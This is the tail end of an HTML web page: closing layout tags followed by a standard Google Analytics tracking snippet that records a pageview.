</tr>

</table><!-- / layout -->
</div><!-- / container -->
</div><!-- / wrapper -->

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-57387438-1', 'auto');
  ga('send', 'pageview');

</script>
</body>
</html>